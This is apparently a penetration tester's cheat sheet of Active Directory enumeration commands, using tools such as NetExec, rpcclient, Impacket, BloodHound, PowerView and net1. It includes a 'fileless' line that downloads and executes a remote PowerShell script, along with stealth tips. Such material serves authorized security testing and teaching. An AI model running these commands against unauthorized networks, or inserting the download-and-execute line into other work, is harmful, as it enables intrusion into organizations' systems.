PRIMARY CATEGORY → WINDOWS RECONNAISSANCE
Components ⟡
Tools
Credentialed Enumeration - UNIX-like
Netexec
Users
nxc smb <TARGET> --username '<USER>' --password '<PASSWD>' --users | awk -v IGNORECASE=1 '/-Username-/ { v = 1 ; next } !/\[\*\]/ && v { print $5 }'
Groups
nxc smb <TARGET> --username '<USER>' --password '<PASSWD>' --groups
Logged on Users
nxc smb <TARGET> --username '<USER>' --password '<PASSWD>' --loggedon-users
RPCClient
Users
SAMR
rpcclient --user '<USER>%<PASSWD>' --command 'enumdomusers' <TARGET> | grep -ioP --color -- '^user:\[\K.*?(?=\])'
Groups
SAMR
rpcclient --user '<USER>%<PASSWD>' --command 'enumdomgroups' <TARGET> | grep -ioP --color -- '^group:\[\K.*?(?=\])'
Users & Groups
LSARPC
RID Cycling
for _rid in {500..1500} ; do rpcclient --user '<USER>%<PASSWD>' --command "lookupsids <DOMAIN_SID>-$_rid" <DC> ; done | awk -v IGNORECASE=1 '!/unknown/ { gsub(/.+\\/,"", $2) ; print $2 }'
Ldapsearch
Users
ldapsearch -LLL -x -H 'ldap://<TARGET>' -D '<USER>@<DOMAIN>' -w '<PASSWD>' -b 'DC=<DOMAIN>,DC=<TLD>' '(ObjectClass=User)' samAccountName dn userPrincipalName cn | grep -vPi --color -- '^#.+$'
Groups
ldapsearch -LLL -x -H 'ldap://<TARGET>' -D '<USER>@<DOMAIN>' -w '<PASSWD>' -b 'DC=<DOMAIN>,DC=<TLD>' '(ObjectClass=Group)' samAccountName dn userPrincipalName cn | grep -vPi --color -- '^#.+$'
Impacket's GetADUsers.py
Users
GetADUsers.py -dc-ip <DC> -all '<DOMAIN>/<USER>:<PASSWD>' 2> /dev/null | awk '/-{3,}/ { v=1 ; next } v { print $1 }'
Impacket's GetADComputers.py
GetADComputers.py -dc-ip '<DC_IP>' -dc-host '<DC_FQDN>' -resolveIP '<DOMAIN>/<USER>:<PASSWD>' | grep -viP --color -- 'unable to resolve'
Impacket's Samrdump.py
Users
samrdump.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>' 2> /dev/null | awk -v IGNORECASE=1 '/AccountIsDisabled: False/ { print $1 }'
Impacket's Lookupsid.py
Users & Groups
lookupsid.py '<DOMAIN>/<USER>:<PASSWD>@<TARGET>'
Windapsearch (Go version)
Users, Computers, Groups, GPOs and so on
Users
windapsearch --domain '<DOMAIN>' --dc '<TARGET>' --username '<USER>' --password '<PASSWD>' --module users
Groups
windapsearch --domain '<DOMAIN>' --dc '<TARGET>' --username '<USER>' --password '<PASSWD>' --module groups
Ldapdomaindump.py
Users, Computers, Groups, GPOs and so on
Setup
git clone https://github.com/dirkjanm/ldapdomaindump ldapdomaindump
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install .
Usage
mkdir domain_tld.data
cd !$ && python3 ../ldapdomaindump.py --user '<DOMAIN>\<USER>' --password '<PASSWD>' --no-grep --no-json '<TARGET>'
python3 -m http.server <PORT>
BloodHound.py
Setup
Intended for BH-CE Ingestion (Not BH-Legacy)
git clone https://github.com/dirkjanm/BloodHound.py BH.py
cd !$ && git checkout bloodhound-ce
python3 -m venv .venv
. !$/bin/activate && pip3 install .
Usage
python3 bloodhound.py --collectionmethod All --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' --nameserver '<DC_IP>' --domain-controller '<DC_FQDN>' --zip
If UDP port 53 of the specified nameserver is not reachable, add the --dns-tcp flag to force DNS over TCP:
python3 bloodhound.py --collectionmethod All --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' --nameserver '<DC_IP>' --domain-controller '<DC_FQDN>' --zip --dns-tcp
Credentialed Enumeration - Windows
AD Powershell Module
Setup
Import-Module ActiveDirectory
Users
Get-ADUser
- All Domain User Accounts
Get-ADUser -Filter * | Select-Object samAccountName
- Specific Domain User Account
Get-ADUser -Identity <USER> # SamAccountName
Groups
Get-ADGroup
- All Domain Groups
Get-ADGroup -Filter * | Select-Object samAccountName
- Specific Domain Group
Get-ADGroup -Identity <GROUP> # SamAccountName
Group Membership
Get-ADGroupMember
Get-ADGroupMember -Identity 'Admins. del dominio'
Domain Info.
Get-ADDomain
Get-ADDomain
Trust Relationships
Get-ADTrust -Filter *
Powerview
Setup
- Fileless
IEX (New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1')
- Touching Disk
IWR -UseBasicParsing -Uri 'https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1' -OutFile '.\powerview.ps1'
Import-Module .\powerview.ps1
Users
Get-DomainUser
- All Domain User Accounts
Get-DomainUser -Identity * -Domain <DOMAIN> | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol
- Specific Domain User Account
Get-DomainUser -Identity <USER> -Domain <DOMAIN> | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol
Groups
- All Domain Groups
Get-DomainGroup
- Specific Domain Group
Get-DomainGroup -Identity '<GROUP>'
Group Membership
Recursive i.e. Nested Group Membership Scope
Get-DomainGroupMember
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Trust Relationships
Get-DomainTrustMapping
Get-DomainTrustMapping
Local Admin Access on a certain Domain-Joined Computer
Test-AdminAccess
Test-AdminAccess -ComputerName <TARGET>
SharpHound
SharpHound.exe
CollectionMethod → All
Download it from BloodHound-{CE,Legacy} GUI
.\SharpHound.exe -c All
Living off the Land
WMI
Net Command
Net1.exe for more OPSEC
- Local Users
net1 user # All Local User Accounts
net1 user "<USER>" # Specific Local User Account
- Domain Users
net1 user /domain # All Domain User Accounts
net1 user "<USER>" /domain # Specific Domain User Account
- Local Groups
net1 localgroup # All Local Groups
net1 localgroup "<GROUP>" # Specific Local Group
- Domain Groups
net1 group /domain # All Domain Groups
net1 group "<GROUP>" /domain # Specific Domain Group
- Domain Password Policy
net1 accounts /domain
DSquery
Local privileges required
- Domain Users
dsquery user
- Domain Computers
dsquery computer
- Custom Search via LDAP Filters
dsquery * -Filter '<LDAP_FILTER>' -Attr '<ATTRIBUTES>'